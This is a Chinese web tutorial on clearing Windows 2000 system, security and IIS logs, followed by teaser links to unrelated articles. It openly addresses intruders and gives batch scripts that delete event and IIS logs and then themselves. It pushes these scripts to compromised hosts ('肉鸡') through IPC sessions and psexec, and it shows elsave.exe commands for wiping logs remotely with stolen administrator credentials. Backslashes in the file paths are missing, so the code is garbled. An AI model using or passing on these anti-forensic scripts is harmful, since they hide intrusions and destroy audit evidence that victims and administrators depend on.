清除系统log的方法附批处理文件

什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的,无论是网络管理员还是 黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防,日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。 
  一、日志文件的位置

  Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。

  安全日志文件:%systemroot%system32configSecEvent.EVT

  系统日志文件:%systemroot%system32configSysEvent.EVT

  应用程序日志文件:%systemroot%system32configAppEvent.EVT

  有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。

  二、清除自己电脑中的日志

  如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。

  三、清除远程主机上的日志

  大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:

  @del c:winntsystem32logfiles*.*

  @del c:winntsystem32config*.evt

  @del c:winntsystem32dtclog*.*

  @del c:winntsystem32*.log

  @del c:winntsystem32*.txt

  @del c:winnt*.txt

  @del c:winnt*.log

  @del c:del.bat

  把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。

  接下来再新建一个批处理文件,内容如下:

  @copy del.bat \%1c$

  @echo 向肉鸡复制本机的del.bat……OK

  @psexec \%1 c:del.bat

  @echo 在肉鸡上运行del.bat,清除日志文件……OK

  保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。

  清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \ip pass /user: user,然后在命令行下执行如下命令:elsave -s \ip -l application -C,这样就删除了安全日志。

(0)

相关推荐

  • 清除系统log的方法附批处理文件

    什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在.在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复.日志对于系统安全的作用是显而易见的,无论是网络管理员还是 黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志.无论是攻还是防,日志的重要性由此可见.下面我们就来简单讨论一下日志文件的清除方法.  一.日志文件的位置 Windows 2000的系统日志文件

  • 清除系统默认共享方法揭秘

    自从Windows 2000操作系统开始,微软就添加了一个新的网络功能,叫做Windows默认共享.有朋友会问了,为什么叫"默认共享"呢?原来,这些文件夹与我们自己手工建立的共享文件夹之间有着一个本质的区别,在它们的共享名称最后都会有一个"$"符号,作用就是能够在网上邻居中隐藏自己.这样,除非我们预先知道这些默认共享的共享名,否则,按照常规方法是根本无法直接进入到这些文件夹的.起初这项功能主要是微软为了方便系统管理员的日常工作而设计的,并且在默认情况下它们就是开启的

  • 一分钟清除系统中所有垃圾文件

    Windows在安装和使用过程中都会产生相当多的垃圾文件,包括临时文件(如:*.tmp.*._mp)日志文件(*.log).临时帮助文件(*.gid).磁盘检查文件(*.chk).临时备份文件(如:*.old.*.bak)以及其他临时文件.特别是如果一段时间不清理IE的临时文件夹"Temporary Internet Files",其中的缓存文件有时会占用上百MB的磁盘空间.这些垃圾文件不仅仅浪费了宝贵的磁盘空间,严重时还会使系统运行慢如蜗牛.这点相信你肯定忍受不了吧!所以应及时清理系

  • 清除系统垃圾文件的批处理(无错增强版)

    "清除系统垃圾.bat","clear.bat","一键清除系统垃圾.bat","30秒清除系统垃圾.bat","快速清除系统垃圾.bat" 基本上找到的者是一个文件, 但这里面也有很多不足或需要改进的地方,但大多数人看不懂DOS命令,所以被改的机会会很少,下面是我所发现的问题及其改进,可以说是比较完美的版本了. 从网上找的,修改了一行,以解决ASP+ACCESS错误:"Microsoft JET

  • Android编程实现拦截短信并屏蔽系统Notification的方法

    本文实例讲述了Android编程实现拦截短信并屏蔽系统Notification的方法.分享给大家供大家参考,具体如下: 拦截短信有几个关键点: 1.android接收短信时是以广播的方式 2.程序只要在自己的Manifest.xml里加有"接收"SMS的权限 <uses-permission android:name="android.permission.RECEIVE_SMS"> </uses-permission> <uses-p

  • php解析xml 的四种简单方法(附实例)

    XML处理是开发过程中经常遇到的,PHP对其也有很丰富的支持,本文只是对其中某几种解析技术做简要说明,包括:Xml parser, SimpleXML, XMLReader, DOMDocument. 1. XML Expat Parser: XML Parser使用Expat XML解析器.Expat是一种基于事件的解析器,它把XML文档视为一系列事件.当某个事件发生时,它调用一个指定的函数处理它.Expat是无验证的解析器,忽略任何链接到文档的DTD.但是,如果文档的形式不好,则会以一个错误

  • Android开发之在程序中时时获取logcat日志信息的方法(附demo源码下载)

    本文实例讲述了Android开发之在程序中时时获取logcat日志信息的方法.分享给大家供大家参考,具体如下: 今天分享一个在软件开发中很实用的例子,也是这几天在通宵加班中我使用的一个小例子, 在程序中监听Log信息. 为什么说它实用?原因是Android的开发厂商各种修改之后手机和手机之间以后存在很多差异.比如说魅族M9手机 开发中如果项目中涉及到访问手机系统的地方,例如访问系统短信库,M9手机它会提示一个dialog框 让用户自己去选择 访问还是不访问.这样就给开发适配带来了巨大的麻烦.本来

  • Android编程实现保存图片到系统图库的方法示例

    本文实例讲述了Android编程实现保存图片到系统图库的方法.分享给大家供大家参考,具体如下: 最近有些用户反映保存图片之后在系统图库找不到保存的图片,遂决定彻底查看并解决下. Adnroid中保存图片的方法可能有如下两种: 第一种是自己写方法,如下代码: public static File saveImage(Bitmap bmp) { File appDir = new File(Environment.getExternalStorageDirectory(), "Boohee"

  • git克隆远程仓库的指定分支方法(附常用git配置命令)

    一.普通克隆方式: git clone <远程仓库地址> 这种克隆方式默认是克隆master主分支,而且通过命令 git branch --list 能看到克隆后在本地也只有这一个分支,如果再通过新建分支再拉取指定分支,甚至可能还需要解决冲突,太繁琐. 二.克隆远程指定分支 那么,如何快速有效的直接克隆远程指定分支? 只需要一条命令: git clone -b <指定分支名> <远程仓库地址> 会自动在克隆该分支在本地,同样克隆后本地只有这一个分支. 附:常用git配置

  • tmpwatch命令清除旧文件的方法

    我们知道系统里面常常会有一些忘记删除的长时间不用而且确实没有用处的文件,如果不去处理,这些无用的文件会越来越多,浪费许多系统资源.在不知道文件名的情况下,很难去检查某一目录下到底是哪些文件长时间没有被访问,同时删除这些文件.我们今天就介绍一款非常实用的工具来完成这一工作----tmpwatch tmpwatch 是什么 tmpwatch 能够循环地删除指定目录下指定时间内没有被访问的文件,这一命令常常用于清理临时文件目录,比如 /tmp 或者 /var/tmp 这类目录. 它只清除指定目录下的空

随机推荐